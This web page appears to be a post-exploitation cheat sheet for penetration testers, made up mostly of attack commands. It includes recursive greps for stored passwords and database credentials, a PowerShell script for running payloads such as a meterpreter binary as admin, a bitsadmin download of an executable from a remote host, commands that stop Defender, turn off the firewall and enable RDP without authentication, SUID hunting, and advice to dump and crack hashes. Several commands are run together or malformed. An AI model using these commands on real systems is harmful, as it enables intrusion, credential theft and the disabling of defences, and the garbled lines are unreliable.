Skip to content

Post Exploitation

Post-exploitation is a phase after an attacker has successfully breached a system. During this stage, the focus shifts from gaining initial access to maintaining control and further exploring the compromised environment. This involves activities such as privilege escalation, lateral movement within the network, data exfiltration, and establishing persistent access. Post-exploitation techniques aim to maximize the attacker's control over the compromised system and gather valuable information without raising suspicion.

grep -rnw '/' -ie 'pass' --color=always
grep -rnw '/' -ie 'DB_PASS' --color=always
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
grep -rnw '/' -ie 'DB_USER' --color=always

File Upload on linux systems via base64 encoding Converting a file to base64

Once the file is converted to base64, you can just create a new file on the remote system and copy the base64 output of the above file into it. Next step would be to reverse the base64 to binary

cat fileWithBase64Content | base64 -d > finalBinary

You can also use the smbserver.py from Impacket’s repo to host a temporary smb server and fetch files in windows from remote smb servers using the net use command.

PSexec Shells of Remote Systems

Eg: Get cmd.exe shell of remote system with user administrator and password

Powershell Sudo for Windows

There maybe times when you know the creds to admin, but will have a low privileged shell. Unlike Linux, we cannot sudo on windows machines. So, I wrote a simple powershell script for that which can run a separate file as admin. You can run a batch file to add a new superuser or just execute a meterpreter binary as admin. The below command is to be run in a powershell window:

$pw = ConvertTo-SecureString "EnterPasswordHere" -AsPlainText -Force
$pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "EnterDomainName\EnterUserName", $pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
Start-Process powershell -Credential $pp -ArgumentList '-NoProfile -Command &{Start-Process $script -Verb RunAs}'

If however you want to run the powershell from a cmd prompt, you can run store the above command in a xyz.ps1 file and run it in cmd as below:

powershell -ExecutionPolicy Bypass -File xyz.ps1​

Download files in Windows with

bitsadmin bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\Users\\%USERNAME%\AppData\local\temp\xyz.exe

Disable firewall/defender and enable RDP for all Sometimes you will have the admin creds and may require an RDP Session to find out what exactly is going on in the backend for post exploitation. Below commands will help you disable firewall and enable RDP over insecure connections

sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Print files with the line number where the string is found grep -rnw '/' -ie 'password' --color=always

Find files with SUID permission

find / -perm -4000 -type f 2>/dev/null

Find files with open permissions

 find / -perm -777 -type f 2>/dev/null

Find files with SUID permission for current user

find / perm /u=s -user `whoami` 2>/dev/nullfind / -user root -perm -4000 -print 2>/dev/null

Find files with writable permission for current user or current group

find / perm /u=w -user `whoami` 2>/dev/nullfind / -perm /u+w,g+w -f -user `whoami` 2>/dev/nullfind / -perm /u+w -user `whoami` 2>/dev/nul

Find directories with writable permissions for current user or current group

find / perm /u=w -type -d -user `whoami` 2>/dev/nullfind / -perm /u+w,g+w -d -user `whoami` 2>/dev/null

In order to move horizontally on the network we need to know as much about the machine as possible. We need to loot it. These are some things that must be done on every compromised machine.

Tcp dump

Who else is connected to the machine?

Dump the hashes

It is always good to have a list of all the hashes and crack them. Maybe someone is reusing the password.

To what is the machine connected?

  • netstat

  • ipconfig

Email and personal files

Logs

​ ​